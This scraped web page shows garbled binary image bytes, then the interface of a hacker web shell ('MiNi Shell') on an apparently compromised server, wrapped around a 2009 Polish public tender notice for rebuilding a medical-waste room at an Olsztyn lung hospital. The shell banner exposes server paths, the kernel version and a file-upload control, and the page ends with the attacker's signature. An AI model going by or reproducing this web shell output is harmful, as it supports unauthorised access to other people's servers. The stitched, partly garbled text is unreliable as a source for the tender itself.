JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090701/218044-N-2009.html

<p class="kh_header"><b>Olsztyn: PRZEBUDOWA POMIESZCZENIA NA ODPADY MEDYCZNE</b><br>
<b>Numer ogłoszenia: 218044 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA POMIESZCZENIA NA ODPADY MEDYCZNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie  i dostosowaniu pomieszczenia odpadów medycznych do obowiązujących przepisów.
2. W ramach przebudowy pomieszczeń na odpady medyczne, zostaną  wykonane prace polegające na:
  a) wydzieleniu oddzielnego pomieszczenia do składowania odpadów niezakaźnych żywnościowych, wyposażonych w samodzielne wejście z drzwiami bez progu uszczelnione na styku z podłogą szczotka  z tworzywa sztucznego), wykonaniu posadzki z płytek typu gres antypoślizgowy  z kratką ściekową; wykonaniu okładziny ścian z wykładziny PCV zgrzewanej;  w pomieszczeniu zamontowany zostanie dodatkowo zawór czerpalny, wywietrzak  dachowy, nierdzewne odboje na wysokości boków pojemników. 
b)   podzieleniu pozostałej części pomieszczenia na przedsionek z istniejącym wejściem, które będzie pełniło rolę wejścia czystego, oraz pomieszczenie na odpady medyczne. W ściance oddzielającej przedsionek od pomieszczenia na odpady medyczne zamontowane będą  drzwi bez progu z uszczelnieniem pomiędzy drzwiami i podłogą. W wydzielonym pomieszczeniu na odpady medyczne  w miejscu istniejącego okna zostaną zamontowane ocieplone drzwi brudne (bez progu z uszczelnieniem pomiędzy drzwiami i podłogą) oraz naświetle nad drzwiami               w miejscu istniejącego okna. Posadzka wykonana z płytek typu gres antypoślizgowy                     z kratkami ściekowymi. Okładziny ścian z wykładziny PCV zgrzewanej.  W pomieszczeniu na odpady medyczne wydzielono dwa boksy (ścianka murowana na wysokość 2,5m). Pomieszczenie wyposażone będzie  w wentylator dachowy wyciągowy, klimatyzator dachowy, dozownik do płynu dezynfekującego, wagę do ważenia  pojemników z odpadami.
  c) kompleksowej przebudowie instalacji elektrycznej, wod-kan, c. o. w ww. pomieszczeniach.
3.  Szczegółowy zakres przedmiotu zamówienia został określony w załącznikach do niniejszej SIWZ, a mianowicie w przedmiarze robót, dokumentacji  technicznej, specyfikacji technicznej wykonania  i odbioru robót, opisie technicznym projektu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.22.21.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Zgodnie z art. 45 ust. 2 ustawy Zamawiający wymaga  wniesienia wadium w wysokości:
     2500,00 zł (słownie:  dwa tysiące pięćset złotych 00/100)
2.  Wadium może być wniesione w następujących formach:
a)  pieniądzu - przelewem na rachunek bankowy: Bank Millennium S.A   77   1160   2202  0000  0000  6193  7410 
b)  poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,            z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c)  gwarancjach bankowych,
     d)  gwarancjach ubezpieczeniowych,                                                                                                     e)  poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2   ustawy              z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.           z 2007 roku, Nr 42, poz. 275). 
3.  Wadium wniesione w formie innej niż pieniężna winno być przesłane do dnia 21.07.2009 roku do  godz.  9:45,  w  osobnej  kopercie  z nazwą Wykonawcy, z dopiskiem WADIUM - PRZEBUDOWA POMIESZCZENIA NA ODPADY MEDYCZNE (dołączyć  do oferty dowód przelewu, bądź kopię w przypadku innej niż pieniężna formy wadium).
4.  Zamawiający zwraca niezwłocznie  wadium w przypadkach określonych w art. 46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy złożą ważną i odpowiednio przygotowaną ofertę  oraz :
a)	są uprawnieni do występowania w obrocie prawnym,
b)	posiadają uprawnienia do wykonania niniejszego zamówienia,
c)	   posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania niniejszego zamówienia,
d)	    znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia,
e)	    nie podlegają wykluczeniu z postępowania o zamówienie na podstawie art. 24 ust.1 i 2 ustawy.
2.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy zobowiązani są dołączyć do przedkładanej oferty oświadczenia i dokumenty określone w Rozdziale V niniejszej SIWZ Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń jakich żąda od Wykonawców w pkt V SIWZ, stosując formułę spełnia - nie spełnia  wypełniając druk ZP - 14..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony  Formularz ofertowy - Załącznik Nr 1. 
2.	Oświadczenie o spełnianiu warunków wymaganych przez Zamawiającego - Załącznik Nr 2.
3.	Aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy  w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
4.	Wskazanie osoby upoważnionej do podpisania umowy (w przypadku wyłonienia Wykonawcy             w niniejszym postępowaniu) oraz jej aktualne pełnomocnictwo, o ile jej prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
5. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.  Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzające, że  Wykonawca nie zalega             z opłacaniem podatków, opłat.
7. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert, potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne.
8. Kosztorys ofertowy uproszczony, obejmujący pełen zakres robót budowlano-montażowych                      i instalacyjnych wraz z  cenami jednostkowymi i wartością robót, sporządzony przez Wykonawcę wraz z tabelą elementów scalonych i wykazem materiałów zawierającym ich charakterystykę techniczną, ilość, cenę.
  9.  Harmonogram rzeczowo-finansowy. 
10. Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć                w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia (stażu pracy) i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zgodnie z Załącznikiem Nr 4. Do wykazu należy dołączyć dokumentację  kadry inżynieryjno-technicznej, która będzie wykonywać zamówienie, potwierdzającą uprawnienia do sprawowania samodzielnych funkcji technicznych w branży: konstrukcyjno-budowlanej bez ograniczeń, elektrycznej oraz sanitarnej (kserokopie uprawnień osób kierujących robotami oraz aktualne zaświadczenie wydane przez izbę samorządu zawodowego potwierdzające  wpis na listę członków tej izby dla branży konstrukcyjno-budowlanej bez ograniczeń,  elektrycznej, sanitarnej).
11.  Oświadczenie o ewentualnym podwykonawstwie - należy podać nazwę i adres podwykonawcy,  osoby uprawnione do realizacji zamówienia oraz narzędzia i urządzenia, które udostępni podwykonawca, zakres robót,  który zostanie przez niego wykonany - Formularz ofertowy - Załącznik Nr 1.
12. W przypadku wskazania podwykonawcy, Wykonawca winien dołączyć do oferty jego pisemne zobowiązanie do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 13 zostały wskazane narzędzia i urządzenia, którymi będzie dysponował oraz pisemnego zobowiązania podwykonawcy do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 13,  wskazano osoby, którymi będzie dysponował.
13. Wykaz  min. 3 robót budowlanych, wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) o podobnym charakterze co niniejszy przedmiot zamówienia, z podaniem daty i miejsca wykonania tych robót oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
14.  Potwierdzenie dokonania wizji lokalnej na terenie przyszłej budowy, zawierające podpis i pieczęć  przedstawiciela Zamawiającego, tj.: Z-cę Dyrektora ds. Technicznych, inspektora ds. budowlanych lub kierownika Działu Obsługi Szpitala.
15.  Oświadczenie o zapoznaniu się z oryginałami dokumentacji projektowej znajdującej się w siedzibie Zamawiającego oraz oświadczeniu o nie wnoszeniu do niej uwag.
16.  Dowód wniesienia wadium.
17.  Podpisany (zaakceptowany projekt umowy) - Załącznik Nr 3.
18. Wymagane dokumenty w przypadku składania oferty przez podmioty działające wspólnie na  podstawie  zawartej na piśmie umowy: 
18.1 Oferta składana przez dwa lub kilka podmiotów, które występują wspólnie - konsorcja (tj. osoby fizyczne, osoby prawne oraz jednostki organizacyjne nie posiadające osobowości prawnej) musi spełniać następujące wymagania:
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania                        w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego a takie pełnomocnictwo musi być podpisane przez osoby upoważnione do reprezentowania wszystkich Wykonawców.
b) Każdy z uczestników Konsorcjum dołączy do oferty oświadczenie, że w przypadku wygrania przetargu, będzie ponosił solidarną odpowiedzialność wobec Zamawiającego na etapie realizacji zamówienia jak i z tytułu udzielonych gwarancji i rękojmi.
18.2.Każdy z wykonawców musi oddzielnie złożyć dokumenty i oświadczenia zawarte w ust. 2, 5, 6, 7. Pozostałe dokumenty mające na celu potwierdzenie spełnienia wymogów  SIWZ oferenci złożą wspólnie.
18.3.Wniesienie wadium musi wyraźnie wskazywać na wszystkich wykonawców składających wspólną ofertę.
18.4.Oferta składana przez spółkę cywilną musi zawierać:
a)  umowę spółki,
b)  wszystkie dokumenty wymienione w SIWZ,
   c) każdy ze wspólników musi oddzielnie złożyć oświadczenie, o którym mowa w ust. 2, 5, 6, 7.
19. W przypadku oferty składanej przez spółkę z o.o., gdy wartość zamówienia przekracza podwójną wysokość  kapitału zakładowego, zarząd spółki powinien być upoważniony uchwałą zgromadzenia wspólników do zawierania umowy (art. 230 Kodeksu Spółek  Handlowych).
20. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  zamiast dokumentów, o których mowa w ust. 6, 7, 8,  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
     a)   nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
21. Dokumenty, o których mowa w ust. 20 a), powinny być wystawione nie wcześniej niż                       6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału                          w postępowaniu  o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa              w ust. 20 b), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
22.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 22, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Budynek administracji, pok. 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 09:45, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com